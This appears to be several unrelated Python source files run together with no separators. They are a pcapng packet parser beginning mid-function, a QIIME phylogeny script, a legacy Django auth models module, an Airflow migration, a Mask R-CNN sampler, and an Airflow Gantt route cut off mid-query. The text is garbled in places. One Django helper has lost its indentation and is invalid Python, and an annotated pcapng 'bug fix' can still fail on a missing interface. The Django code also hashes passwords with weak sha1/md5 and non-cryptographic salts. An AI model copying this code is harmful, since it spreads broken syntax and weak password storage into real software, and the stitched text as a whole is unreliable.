                icmp_hdr = vs_inet.ICMP()
            icmp_hdr.vsParse(b, offset, fast=True)
            offset += len(icmp_hdr)
            pdata = b[offset:]
            yield pkt,ipv4,icmp_hdr,pdata
        else:
            # other IP protocols are silently skipped
            pass
            #print 'UNHANDLED IP PROTOCOL: %d' % ipv4.proto
def _iterPcapNgFile(fd, reuse=False):
    '''
    Yield (pkt_block, ipv4, transport_header, payload_bytes) tuples from
    a pcapng format file object.
    '''
    header = PCAPNG_GENERIC_BLOCK_HEADER()
    ifaceidx = 0
    ifacedict = {}
    roff = 0
    bigend = False
    # peek at the next block header without consuming it
    curroff = fd.tell()
    b0 = fd.read(len(header))
    fd.seek(curroff)
    while len(b0) == len(header):
        header.vsParse(b0, fast=True)
        body = fd.read(header.blocksize)
        if header.blocktype == PCAPNG_BLOCKTYPE_SECTION_HEADER:
            shb = PCAPNG_SECTION_HEADER_BLOCK()
            roff = shb.vsParse(body)
            bigend = shb.bigend
            #reset interface stuff since we're in a new section
            ifaceidx = 0
            ifacedict = {}
        elif header.blocktype == PCAPNG_BLOCKTYPE_INTERFACE_DESCRIPTION:
            idb = PCAPNG_INTERFACE_DESCRIPTION_BLOCK(bigend)
            roff = idb.vsParse(body)
            #save off the interface for later reference
            ifacedict[ifaceidx] = idb
            ifaceidx += 1
        elif header.blocktype == PCAPNG_BLOCKTYPE_SIMPLE_PACKET:
            spb = PCAPNG_SIMPLE_PACKET_BLOCK(bigend)
            roff = spb.vsParse(body)
            # Bug fix: simple packet blocks implicitly belong to the
            # section's first interface.  The old code referenced a
            # leftover 'iface' local, which raised NameError when a
            # simple packet appeared before any enhanced packet (and
            # used a stale interface otherwise).  Also give the block
            # libpcap-style tvsec/tvusec fields like enhanced packets.
            iface = ifacedict.get(0)
            spb.setPcapTimestamp(iface)
            tup = _parsePcapngPacketBytes(iface.linktype, spb)
            if tup is not None:
                #if it is None, just fall through & read next block
                yield tup
        elif header.blocktype == PCAPNG_BLOCKTYPE_ENHANCED_PACKET:
            epb = PCAPNG_ENHANCED_PACKET_BLOCK(bigend)
            roff = epb.vsParse(body)
            iface = ifacedict.get(epb.interfaceid)
            epb.setPcapTimestamp(iface)
            tup = _parsePcapngPacketBytes(iface.linktype, epb)
            if tup is not None:
                #if tup is None, just fall through & read next block
                yield tup
        #TODO: other blocks needed?
        #PCAPNG_BLOCKTYPE_PACKET (obsolete)
        #PCAPNG_BLOCKTYPE_NAME_RESOLUTION:
        #PCAPNG_BLOCKTYPE_INTERFACE_STATS:
        else:
            #print 'Unknown block type: 0x%08x: 0x%08x 0x%08x bytes' % (roff, header.blocktype, header.blocksize)
            pass
        # peek at the next block header
        curroff = fd.tell()
        b0 = fd.read(len(header))
        fd.seek(curroff)
def _parsePcapngPacketBytes(linktype, pkt):
    '''
    pkt is either a parsed PCAPNG_SIMPLE_PACKET_BLOCK or PCAPNG_ENHANCED_PACKET_BLOCK
    On success Returns tuple (pcapng_pkt, ipv4_vstruct, transport_vstruct, pdata)
    Returns None if the packet can't be parsed
    '''
    if linktype not in (PCAP_LINKTYPE_ETHER, PCAP_LINKTYPE_RAW):
        raise Exception('PCAP Link Type %d Not Supported Yet!' % linktype)
    #pkt = PCAP_PACKET_HEADER()
    eII = vs_inet.ETHERII()
    eIIsize = len(eII)
    offset = 0
    if linktype == PCAP_LINKTYPE_ETHER:
        if len(pkt.data) < eIIsize:
            return None
        eII.vsParse(pkt.data, 0, fast=True)
        # No support for non-ip protocol yet...
        if eII.etype not in (vs_inet.ETH_P_IP,vs_inet.ETH_P_VLAN):
            return None
        offset += eIIsize
        if eII.etype == vs_inet.ETH_P_VLAN:
            # skip the 4-byte 802.1Q VLAN tag
            offset += 4
    elif linktype == PCAP_LINKTYPE_RAW:
        # raw IP: datagram starts at offset 0
        pass
    ipv4 = vs_inet.IPv4()
    if (len(pkt.data) - offset) < len(ipv4):
        return None
    ipv4.vsParse(pkt.data, offset, fast=True)
    # Make b *only* the IP datagram bytes...
    b = pkt.data[offset:offset+ipv4.totlen]
    offset = 0
    offset += len(ipv4)
    tsize = len(b) - offset
    if ipv4.proto == vs_inet.IPPROTO_TCP:
        if tsize < 20:
            # too short to hold a TCP header
            return None
        tcp_hdr = vs_inet.TCP()
        tcp_hdr.vsParse(b, offset, fast=True)
        offset += len(tcp_hdr)
        pdata = b[offset:]
        return pkt,ipv4,tcp_hdr,pdata
    elif ipv4.proto == vs_inet.IPPROTO_UDP:
        if tsize < 8:
            # too short to hold a UDP header
            return None
        udp_hdr = vs_inet.UDP()
        udp_hdr.vsParse(b, offset, fast=True)
        offset += len(udp_hdr)
        pdata = b[offset:]
        return pkt,ipv4,udp_hdr,pdata
    elif ipv4.proto == vs_inet.IPPROTO_ICMP:
        if tsize < 4:
            # too short to hold an ICMP header
            return None
        icmp_hdr = vs_inet.ICMP()
        icmp_hdr.vsParse(b, offset, fast=True)
        offset += len(icmp_hdr)
        pdata = b[offset:]
        return pkt,ipv4,icmp_hdr,pdata
    else:
        # other IP protocols are not handled
        pass
        #print 'UNHANDLED IP PROTOCOL: %d' % ipv4.proto
    return None
#!/usr/bin/env python
# File created on 09 Feb 2010
from __future__ import division
__author__ = "Justin Kuczynski, Jens Reeder"
__copyright__ = "Copyright 2011, The QIIME Project"
__credits__ = ["Justin Kuczynski"]
__license__ = "GPL"
__version__ = "1.9.1-dev"
__maintainer__ = "Justin Kuczynski"
__email__ = "justinak@gmail.com"
from os.path import splitext
from qiime.util import make_option
from qiime.util import parse_command_line_parameters
from qiime.make_phylogeny import tree_module_names, tree_method_constructors,\
CogentTreeBuilder
import warnings
# QIIME command-line metadata: parsed by parse_command_line_parameters()
# in main() to build the option parser and usage text.
script_info = {}
script_info['brief_description'] = """Make Phylogeny"""
script_info[
    'script_description'] = """Many downstream analyses require that the phylogenetic tree relating the OTUs in a study be present. The script make_phylogeny.py produces this tree from a multiple sequence alignment. Trees are constructed with a set of sequences representative of the OTUs, by default using FastTree (Price, Dehal, & Arkin, 2009)."""
script_info['script_usage'] = []
script_info['script_usage'].append(
    ("""Examples:""",
     """A simple example of make_phylogeny.py is shown by the following command, where we use the default tree building method (fasttree) and write the file to the current working directory without a log file:""",
     """%prog -i $PWD/aligned.fasta -o $PWD/rep_phylo.tre"""))
script_info['script_usage'].append(
    ("""""",
     """Alternatively, if the user would prefer using another tree building method (i.e. clearcut (Sheneman, Evans, & Foster, 2006)), then they could use the following command:""",
     """%prog -i $PWD/aligned.fasta -t clearcut"""))
script_info['output_description'] = """The result of make_phylogeny.py consists of a newick formatted tree file (.tre) and optionally a log file. The tree file is formatted using the Newick format and this file can be viewed using most tree visualization tools, such as TopiaryTool, FigTree, etc.
The tips of the tree are the first word from the input sequences from the fasta file, e.g.: '>101 PC.481_71 RC:1..220' is represented in the tree as '101'."""
script_info['required_options'] = [
    make_option('-i', '--input_fp', action='store',
                type='existing_filepath', dest='input_fp', help='Path to read ' +
                'input fasta alignment, only first word in defline will be considered')
]
# root methods accepted by the -r option
valid_root_methods = ['midpoint', 'tree_method_default']
script_info['optional_options'] = [
    make_option(
        '-t', '--tree_method', action='store', type='choice', choices=list(tree_module_names.keys()),
        help='Method for tree building. Valid choices are: ' +
        ', '.join(tree_module_names.keys()) +
        ' [default: %default]', default='fasttree'),
    make_option('-o', '--result_fp', action='store', type='new_filepath',
                help='Path to store ' +
                'result file [default: <input_sequences_filename>.tre]'),
    make_option('-l', '--log_fp', action='store', type='new_filepath',
                help='Path to store ' +
                'log file [default: No log file created.]'),
    make_option(
        '-r', '--root_method', action='store', type='choice', choices=list(valid_root_methods),
        help='method for choosing root of phylo tree' +
        ' Valid choices are: ' + ', '.join(valid_root_methods) +
        ' [default: tree_method_default]',
        default='tree_method_default'),
]
script_info['version'] = __version__
def main():
    """
    Parse command-line options, pick a tree builder, and write a newick
    tree (plus optional log) for the input alignment.
    """
    option_parser, opts, args = parse_command_line_parameters(**script_info)
    if not (opts.tree_method in tree_method_constructors or
            opts.tree_method in tree_module_names):
        # list() the key views before concatenating so the error path
        # also works on Python 3, where dict_keys does not support '+'.
        option_parser.error(
            'Invalid alignment method: %s.\nValid choices are: %s'
            % (opts.tree_method,
               ' '.join(list(tree_method_constructors.keys()) +
                        list(tree_module_names.keys()))))
    try:
        tree_builder_constructor =\
            tree_method_constructors[opts.tree_method]
        tree_builder_type = 'Constructor'
        params = {}
        tree_builder = tree_builder_constructor(params)
    except KeyError:
        # not a constructor-style method; fall back to a cogent wrapper
        tree_builder = CogentTreeBuilder({
            'Module': tree_module_names[opts.tree_method],
            'Method': opts.tree_method
        })
        tree_builder_type = 'Cogent'
    input_seqs_filepath = opts.input_fp
    result_path = opts.result_fp
    if not result_path:  # empty or None
        fpath, ext = splitext(input_seqs_filepath)  # fpath omits extension
        result_path = fpath + ".tre"
    open(result_path, 'w').close()  # touch
    log_path = opts.log_fp
    if log_path is not None:
        open(log_path, 'w').close()
    if tree_builder_type == 'Constructor':
        # Bug fix: this call previously passed failure_path=failure_path,
        # but no 'failure_path' was ever defined in this module, so the
        # branch always died with a NameError.
        tree_builder(input_seqs_filepath,
                     result_path=result_path, log_path=log_path)
    elif tree_builder_type == 'Cogent':
        tree_builder(result_path, aln_path=input_seqs_filepath,
                     log_path=log_path, root_method=opts.root_method)
# Allow the script to be executed directly from the command line.
if __name__ == "__main__":
    main()
import datetime
import urllib
from django.contrib import auth
from django.contrib.auth.signals import user_logged_in
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.db.models.manager import EmptyManager
from django.contrib.contenttypes.models import ContentType
from django.utils.encoding import smart_str
from django.utils.hashcompat import md5_constructor, sha_constructor
from django.utils.translation import ugettext_lazy as _
from django.utils.crypto import constant_time_compare
# Sentinel stored in User.password to mark an account with no usable
# password; it can never equal a valid '[algo]$[salt]$[hash]' string.
UNUSABLE_PASSWORD = '!' # This will never be a valid hash
def get_hexdigest(algorithm, salt, raw_password):
    """
    Returns a string of the hexdigest of the given plaintext password and salt
    using the given algorithm ('md5', 'sha1' or 'crypt').
    """
    raw_password = smart_str(raw_password)
    salt = smart_str(salt)
    if algorithm == 'crypt':
        try:
            import crypt
        except ImportError:
            raise ValueError('"crypt" password algorithm not supported in this environment')
        return crypt.crypt(raw_password, salt)
    if algorithm == 'md5':
        return md5_constructor(salt + raw_password).hexdigest()
    if algorithm == 'sha1':
        return sha_constructor(salt + raw_password).hexdigest()
    raise ValueError("Got unknown password algorithm type in password.")
def check_password(raw_password, enc_password):
    """
    Returns a boolean of whether the raw_password was correct. Handles
    encryption formats behind the scenes.
    """
    # enc_password is stored as '[algo]$[salt]$[hash]'.
    algo, salt, hsh = enc_password.split('$')
    expected = get_hexdigest(algo, salt, raw_password)
    # constant-time compare avoids leaking match length via timing
    return constant_time_compare(hsh, expected)
def update_last_login(sender, user, **kwargs):
    """
    A signal receiver which updates the last_login date for
    the user logging in.
    """
    user.last_login = datetime.datetime.now()
    user.save()
# Keep last_login current on every successful authentication.
user_logged_in.connect(update_last_login)
class SiteProfileNotAvailable(Exception):
    """Raised by User.get_profile() when AUTH_PROFILE_MODULE is unset,
    malformed, or the profile model cannot be loaded."""
    pass
class PermissionManager(models.Manager):
    # Enables serialization/deserialization of Permission rows by their
    # natural key (codename + content type) instead of by primary key.
    def get_by_natural_key(self, codename, app_label, model):
        return self.get(
            codename=codename,
            content_type=ContentType.objects.get_by_natural_key(app_label, model)
        )
class Permission(models.Model):
    """The permissions system provides a way to assign permissions to specific users and groups of users.
    The permission system is used by the Django admin site, but may also be useful in your own code. The Django admin site uses permissions as follows:
    - The "add" permission limits the user's ability to view the "add" form and add an object.
    - The "change" permission limits a user's ability to view the change list, view the "change" form and change an object.
    - The "delete" permission limits the ability to delete an object.
    Permissions are set globally per type of object, not per specific object instance. It is possible to say "Mary may change news stories," but it's not currently possible to say "Mary may change news stories, but only the ones she created herself" or "Mary may only change news stories that have a certain status or publication date."
    Three basic permissions -- add, change and delete -- are automatically created for each Django model.
    """
    name = models.CharField(_('name'), max_length=50)
    content_type = models.ForeignKey(ContentType)
    codename = models.CharField(_('codename'), max_length=100)
    objects = PermissionManager()

    class Meta:
        verbose_name = _('permission')
        verbose_name_plural = _('permissions')
        # a codename is unique per content type, not globally
        unique_together = (('content_type', 'codename'),)
        ordering = ('codename',)

    def __unicode__(self):
        return u"%s | %s | %s" % (
            unicode(self.content_type.app_label),
            unicode(self.content_type),
            unicode(self.name))

    def natural_key(self):
        # Inverse of PermissionManager.get_by_natural_key().
        return (self.codename,) + self.content_type.natural_key()
    natural_key.dependencies = ['contenttypes.contenttype']
class Group(models.Model):
    """Groups are a generic way of categorizing users to apply permissions, or some other label, to those users. A user can belong to any number of groups.
    A user in a group automatically has all the permissions granted to that group. For example, if the group Site editors has the permission can_edit_home_page, any user in that group will have that permission.
    Beyond permissions, groups are a convenient way to categorize users to apply some label, or extended functionality, to them. For example, you could create a group 'Special users', and you could write code that would do special things to those users -- such as giving them access to a members-only portion of your site, or sending them members-only e-mail messages.
    """
    name = models.CharField(_('name'), max_length=80, unique=True)
    permissions = models.ManyToManyField(Permission, verbose_name=_('permissions'), blank=True)

    class Meta:
        verbose_name = _('group')
        verbose_name_plural = _('groups')

    def __unicode__(self):
        return self.name
class UserManager(models.Manager):
    """Manager with helpers for creating users and random passwords."""

    def create_user(self, username, email, password=None):
        """
        Creates and saves a User with the given username, e-mail and password.
        A None password stores the unusable-password sentinel.
        """
        now = datetime.datetime.now()
        # Normalize the address by lowercasing the domain part of the email
        # address.
        try:
            email_name, domain_part = email.strip().split('@', 1)
        except ValueError:
            # no '@' present; store the address as given
            pass
        else:
            email = '@'.join([email_name, domain_part.lower()])
        user = self.model(username=username, email=email, is_staff=False,
                          is_active=True, is_superuser=False, last_login=now,
                          date_joined=now)
        user.set_password(password)
        user.save(using=self._db)
        return user

    def create_superuser(self, username, email, password):
        """Creates and saves a User with staff and superuser flags set."""
        u = self.create_user(username, email, password)
        u.is_staff = True
        u.is_active = True
        u.is_superuser = True
        u.save(using=self._db)
        return u

    def make_random_password(self, length=10, allowed_chars='abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ23456789'):
        """
        Generates a random password with the given length and given
        allowed_chars. The default alphabet omits visually ambiguous
        characters (i/l/o, I/O, 0/1).
        """
        # Security fix: draw from the OS entropy pool via SystemRandom
        # instead of the deterministic, seedable module-level PRNG.
        from random import SystemRandom
        choice = SystemRandom().choice
        return ''.join([choice(allowed_chars) for i in range(length)])
# A few helper functions for common logic between User and AnonymousUser.
def _user_get_all_permissions(user, obj):
permissions = set()
anon = user.is_anonymous()
for backend in auth.get_backends():
if not anon or backend.supports_anonymous_user:
if hasattr(backend, "get_all_permissions"):
if obj is not None:
if backend.supports_object_permissions:
permissions.update(
backend.get_all_permissions(user, obj)
)
else:
permissions.update(backend.get_all_permissions(user))
return permissions
def _user_has_perm(user, perm, obj):
    """
    True as soon as any configured auth backend grants 'perm' to user
    (optionally on the specific object obj).
    """
    anon = user.is_anonymous()
    active = user.is_active
    for backend in auth.get_backends():
        usable = ((not active and not anon and backend.supports_inactive_user) or
                  (not anon or backend.supports_anonymous_user))
        if not usable or not hasattr(backend, "has_perm"):
            continue
        if obj is None:
            if backend.has_perm(user, perm):
                return True
        elif (backend.supports_object_permissions and
                backend.has_perm(user, perm, obj)):
            return True
    return False
def _user_has_module_perms(user, app_label):
    """
    True as soon as any configured auth backend grants user any
    permission within the app named app_label.
    """
    anon = user.is_anonymous()
    active = user.is_active
    for backend in auth.get_backends():
        usable = ((not active and not anon and backend.supports_inactive_user) or
                  (not anon or backend.supports_anonymous_user))
        if not usable or not hasattr(backend, "has_module_perms"):
            continue
        if backend.has_module_perms(user, app_label):
            return True
    return False
class User(models.Model):
    """
    Users within the Django authentication system are represented by this model.
    Username and password are required. Other fields are optional.
    """
    username = models.CharField(_('username'), max_length=30, unique=True, help_text=_("Required. 30 characters or fewer. Letters, numbers and @/./+/-/_ characters"))
    first_name = models.CharField(_('first name'), max_length=30, blank=True)
    last_name = models.CharField(_('last name'), max_length=30, blank=True)
    email = models.EmailField(_('e-mail address'), blank=True)
    # Stored as '[algo]$[salt]$[hexdigest]' or the UNUSABLE_PASSWORD sentinel.
    password = models.CharField(_('password'), max_length=128, help_text=_("Use '[algo]$[salt]$[hexdigest]' or use the <a href=\"password/\">change password form</a>."))
    is_staff = models.BooleanField(_('staff status'), default=False, help_text=_("Designates whether the user can log into this admin site."))
    is_active = models.BooleanField(_('active'), default=True, help_text=_("Designates whether this user should be treated as active. Unselect this instead of deleting accounts."))
    is_superuser = models.BooleanField(_('superuser status'), default=False, help_text=_("Designates that this user has all permissions without explicitly assigning them."))
    last_login = models.DateTimeField(_('last login'), default=datetime.datetime.now)
    date_joined = models.DateTimeField(_('date joined'), default=datetime.datetime.now)
    groups = models.ManyToManyField(Group, verbose_name=_('groups'), blank=True,
        help_text=_("In addition to the permissions manually assigned, this user will also get all permissions granted to each group he/she is in."))
    user_permissions = models.ManyToManyField(Permission, verbose_name=_('user permissions'), blank=True)
    objects = UserManager()

    class Meta:
        verbose_name = _('user')
        verbose_name_plural = _('users')

    def __unicode__(self):
        return self.username

    def get_absolute_url(self):
        # URL-quote since usernames may contain @/./+/-/_ characters.
        return "/users/%s/" % urllib.quote(smart_str(self.username))

    def is_anonymous(self):
        """
        Always returns False. This is a way of comparing User objects to
        anonymous users.
        """
        return False

    def is_authenticated(self):
        """
        Always return True. This is a way to tell if the user has been
        authenticated in templates.
        """
        return True

    def get_full_name(self):
        "Returns the first_name plus the last_name, with a space in between."
        full_name = u'%s %s' % (self.first_name, self.last_name)
        return full_name.strip()

    def set_password(self, raw_password):
        # Hashes raw_password (sha1 with a random 5-char salt) into the
        # password field; None marks the password unusable.  Does not save.
        if raw_password is None:
            self.set_unusable_password()
        else:
            import random
            algo = 'sha1'
            salt = get_hexdigest(algo, str(random.random()), str(random.random()))[:5]
            hsh = get_hexdigest(algo, salt, raw_password)
            self.password = '%s$%s$%s' % (algo, salt, hsh)

    def check_password(self, raw_password):
        """
        Returns a boolean of whether the raw_password was correct. Handles
        encryption formats behind the scenes.
        """
        # Backwards-compatibility check. Older passwords won't include the
        # algorithm or salt.
        if '$' not in self.password:
            is_correct = (self.password == get_hexdigest('md5', '', raw_password))
            if is_correct:
                # Convert the password to the new, more secure format.
                self.set_password(raw_password)
                self.save()
            return is_correct
        return check_password(raw_password, self.password)

    def set_unusable_password(self):
        # Sets a value that will never be a valid hash
        self.password = UNUSABLE_PASSWORD

    def has_usable_password(self):
        # False when the password is unset or the unusable sentinel.
        if self.password is None \
            or self.password == UNUSABLE_PASSWORD:
            return False
        else:
            return True

    def get_group_permissions(self, obj=None):
        """
        Returns a list of permission strings that this user has through
        his/her groups. This method queries all available auth backends.
        If an object is passed in, only permissions matching this object
        are returned.
        """
        permissions = set()
        for backend in auth.get_backends():
            if hasattr(backend, "get_group_permissions"):
                if obj is not None:
                    if backend.supports_object_permissions:
                        permissions.update(
                            backend.get_group_permissions(self, obj)
                        )
                else:
                    permissions.update(backend.get_group_permissions(self))
        return permissions

    def get_all_permissions(self, obj=None):
        # Delegates to the module-level helper shared with AnonymousUser.
        return _user_get_all_permissions(self, obj)

    def has_perm(self, perm, obj=None):
        """
        Returns True if the user has the specified permission. This method
        queries all available auth backends, but returns immediately if any
        backend returns True. Thus, a user who has permission from a single
        auth backend is assumed to have permission in general. If an object
        is provided, permissions for this specific object are checked.
        """
        # Active superusers have all permissions.
        if self.is_active and self.is_superuser:
            return True
        # Otherwise we need to check the backends.
        return _user_has_perm(self, perm, obj)

    def has_perms(self, perm_list, obj=None):
        """
        Returns True if the user has each of the specified permissions.
        If object is passed, it checks if the user has all required perms
        for this object.
        """
        for perm in perm_list:
            if not self.has_perm(perm, obj):
                return False
        return True

    def has_module_perms(self, app_label):
        """
        Returns True if the user has any permissions in the given app
        label. Uses pretty much the same logic as has_perm, above.
        """
        # Active superusers have all permissions.
        if self.is_active and self.is_superuser:
            return True
        return _user_has_module_perms(self, app_label)

    def get_and_delete_messages(self):
        # Drains this user's queued Message rows, returning their text.
        # Part of the deprecated user-messaging API (see message_set).
        messages = []
        for m in self.message_set.all():
            messages.append(m.message)
            m.delete()
        return messages

    def email_user(self, subject, message, from_email=None):
        "Sends an e-mail to this User."
        from django.core.mail import send_mail
        send_mail(subject, message, from_email, [self.email])

    def get_profile(self):
        """
        Returns site-specific profile for this user. Raises
        SiteProfileNotAvailable if this site does not allow profiles.
        """
        # Cached per-instance after the first successful lookup.
        if not hasattr(self, '_profile_cache'):
            from django.conf import settings
            if not getattr(settings, 'AUTH_PROFILE_MODULE', False):
                raise SiteProfileNotAvailable('You need to set AUTH_PROFILE_MO'
                                              'DULE in your project settings')
            try:
                app_label, model_name = settings.AUTH_PROFILE_MODULE.split('.')
            except ValueError:
                raise SiteProfileNotAvailable('app_label and model_name should'
                        ' be separated by a dot in the AUTH_PROFILE_MODULE set'
                        'ting')
            try:
                model = models.get_model(app_label, model_name)
                if model is None:
                    raise SiteProfileNotAvailable('Unable to load the profile '
                        'model, check AUTH_PROFILE_MODULE in your project sett'
                        'ings')
                self._profile_cache = model._default_manager.using(self._state.db).get(user__id__exact=self.id)
                self._profile_cache.user = self
            except (ImportError, ImproperlyConfigured):
                raise SiteProfileNotAvailable
        return self._profile_cache

    def _get_message_set(self):
        # Deprecated accessor kept for backward compatibility; warns and
        # forwards to the related-manager created by Message.user.
        import warnings
        warnings.warn('The user messaging API is deprecated. Please update'
                      ' your code to use the new messages framework.',
                      category=DeprecationWarning)
        return self._message_set
    message_set = property(_get_message_set)
class Message(models.Model):
    """
    The message system is a lightweight way to queue messages for given
    users. A message is associated with a User instance (so it is only
    applicable for registered users). There's no concept of expiration or
    timestamps. Messages are created by the Django admin after successful
    actions. For example, "The poll Foo was created successfully." is a
    message.
    """
    # related_name '_message_set' keeps the reverse accessor "private";
    # User.message_set wraps it with a deprecation warning (see above).
    user = models.ForeignKey(User, related_name='_message_set')
    message = models.TextField(_('message'))

    def __unicode__(self):
        return self.message
class AnonymousUser(object):
    # Stand-in for an unauthenticated request's user. It mirrors the User
    # API: identity attributes are fixed class attributes, permission checks
    # delegate to the same module-level helpers, and any mutating operation
    # raises NotImplementedError.
    id = None
    username = ''
    is_staff = False
    is_active = False
    is_superuser = False
    # Shared empty managers so .groups / .user_permissions behave as empty.
    _groups = EmptyManager()
    _user_permissions = EmptyManager()

    def __init__(self):
        pass

    def __unicode__(self):
        return 'AnonymousUser'

    def __str__(self):
        # Python 2 str(): encode the unicode representation.
        return unicode(self).encode('utf-8')

    def __eq__(self, other):
        # All AnonymousUser instances compare equal to one another.
        return isinstance(other, self.__class__)

    def __ne__(self, other):
        return not self.__eq__(other)

    def __hash__(self):
        return 1  # instances always return the same hash value

    def save(self):
        raise NotImplementedError

    def delete(self):
        raise NotImplementedError

    def set_password(self, raw_password):
        raise NotImplementedError

    def check_password(self, raw_password):
        raise NotImplementedError

    def _get_groups(self):
        return self._groups
    groups = property(_get_groups)

    def _get_user_permissions(self):
        return self._user_permissions
    user_permissions = property(_get_user_permissions)

    def get_group_permissions(self, obj=None):
        # Anonymous users belong to no groups.
        return set()

    def get_all_permissions(self, obj=None):
        return _user_get_all_permissions(self, obj=obj)

    def has_perm(self, perm, obj=None):
        return _user_has_perm(self, perm, obj=obj)

    def has_perms(self, perm_list, obj=None):
        for perm in perm_list:
            if not self.has_perm(perm, obj):
                return False
        return True

    def has_module_perms(self, module):
        return _user_has_module_perms(self, module)

    def get_and_delete_messages(self):
        # Anonymous users have no persisted messages.
        return []

    def is_anonymous(self):
        return True

    def is_authenticated(self):
        return False
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
add dataset_expression in DagModel.
Revision ID: ab34f260b71c
Revises: d75389605139
Create Date: 2024-03-07 19:54:38.316059
"""
from __future__ import annotations
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "ab34f260b71c"
down_revision = "d75389605139"
branch_labels = None
depends_on = None
# First Airflow release that ships this migration.
airflow_version = "2.9.0"
def upgrade():
    """Apply Add dataset_expression to DagModel."""
    # batch_alter_table works on backends with limited ALTER TABLE support
    # (e.g. SQLite). The new column is nullable, so no backfill is required.
    with op.batch_alter_table("dag") as batch_op:
        batch_op.add_column(sa.Column("dataset_expression", sa.JSON(), nullable=True))
def downgrade():
    """Unapply Add dataset_expression to DagModel."""
    # Dropping the column discards any stored dataset expressions.
    with op.batch_alter_table("dag") as batch_op:
        batch_op.drop_column("dataset_expression")
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
import torch
from ..utils import nonzero
class BalancedPositiveNegativeSampler(object):
    """
    Samples fixed-size batches of proposals per image while keeping a target
    share of positive examples in each batch.
    """

    def __init__(self, batch_size_per_image, positive_fraction):
        """
        Arguments:
            batch_size_per_image (int): number of elements to be selected per image
            positive_fraction (float): percentage of positive elements per batch
        """
        self.batch_size_per_image = batch_size_per_image
        self.positive_fraction = positive_fraction

    def __call__(self, matched_idxs):
        """
        Arguments:
            matched_idxs: list of tensors (one per image) containing -1, 0 or
                positive values. -1 entries are ignored, 0 entries count as
                negatives and > 0 entries as positives.

        Returns:
            pos_idx (list[tensor]), neg_idx (list[tensor]): per-image binary
            masks marking the sampled positive and negative elements.
        """
        pos_idx = []
        neg_idx = []

        # An empty input list yields two empty output lists.
        if matched_idxs:
            device = matched_idxs[0].device
            for per_image_idxs in matched_idxs:
                positive = nonzero(per_image_idxs >= 1)[0]
                negative = nonzero(per_image_idxs == 0)[0]

                # Cap the positive count by both the configured fraction and
                # the number actually available, then fill the remainder with
                # negatives (also capped by availability).
                max_pos = int(self.batch_size_per_image * self.positive_fraction)
                num_pos = min(positive.numel(), max_pos)
                num_neg = min(negative.numel(),
                              self.batch_size_per_image - num_pos)

                # Random subset of each group (positive permutation drawn
                # first, matching the original RNG consumption order).
                perm_pos = torch.randperm(positive.numel(), device=device)[:num_pos]
                perm_neg = torch.randperm(negative.numel(), device=device)[:num_neg]

                sampled_pos = positive[perm_pos]
                sampled_neg = negative[perm_neg]

                # Convert the sampled indices into binary masks.
                pos_mask = torch.zeros_like(per_image_idxs, dtype=torch.uint8)
                neg_mask = torch.zeros_like(per_image_idxs, dtype=torch.uint8)
                pos_mask[sampled_pos] = 1
                neg_mask[sampled_neg] = 1

                pos_idx.append(pos_mask)
                neg_idx.append(neg_mask)

        return pos_idx, neg_idx
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations
from fastapi import Depends, HTTPException, status
from sqlalchemy import or_, select, union_all
from airflow.api_fastapi.auth.managers.models.resource_details import DagAccessEntity
from airflow.api_fastapi.common.db.common import SessionDep
from airflow.api_fastapi.common.router import AirflowRouter
from airflow.api_fastapi.core_api.datamodels.ui.gantt import GanttResponse, GanttTaskInstance
from airflow.api_fastapi.core_api.openapi.exceptions import create_openapi_http_exception_doc
from airflow.api_fastapi.core_api.security import requires_access_dag
from airflow.models.taskinstance import TaskInstance
from airflow.models.taskinstancehistory import TaskInstanceHistory
from airflow.utils.state import TaskInstanceState
gantt_router = AirflowRouter(prefix="/gantt", tags=["Gantt"])
@gantt_router.get(
    "/{dag_id}/{run_id}",
    responses=create_openapi_http_exception_doc(
        [
            status.HTTP_404_NOT_FOUND,
        ]
    ),
    # Caller needs read access to both the run and its task instances.
    dependencies=[
        Depends(
            requires_access_dag(
                method="GET",
                access_entity=DagAccessEntity.TASK_INSTANCE,
            )
        ),
        Depends(
            requires_access_dag(
                method="GET",
                access_entity=DagAccessEntity.RUN,
            )
        ),
    ],
)
def get_gantt_data(
    dag_id: str,
    run_id: str,
    session: SessionDep,
) -> GanttResponse:
    """Get all task instance tries for Gantt chart."""
    # Exclude mapped tasks (use grid summaries) and UP_FOR_RETRY (already in history)
    current_tis = select(
        TaskInstance.task_id.label("task_id"),
        TaskInstance.task_display_name.label("task_display_name"),  # type: ignore[attr-defined]
        TaskInstance.try_number.label("try_number"),
        TaskInstance.state.label("state"),
        TaskInstance.start_date.label("start_date"),
        TaskInstance.end_date.label("end_date"),
    ).where(
        TaskInstance.dag_id == dag_id,
        TaskInstance.run_id == run_id,
        TaskInstance.map_index == -1,
        or_(TaskInstance.state != TaskInstanceState.UP_FOR_RETRY, TaskInstance.state.is_(None)),
    )

    # Earlier tries live in TaskInstanceHistory; same column shape so the two
    # selects can be UNION ALLed below.
    history_tis = select(
        TaskInstanceHistory.task_id.label("task_id"),
        TaskInstanceHistory.task_display_name.label("task_display_name"),
        TaskInstanceHistory.try_number.label("try_number"),
        TaskInstanceHistory.state.label("state"),
        TaskInstanceHistory.start_date.label("start_date"),
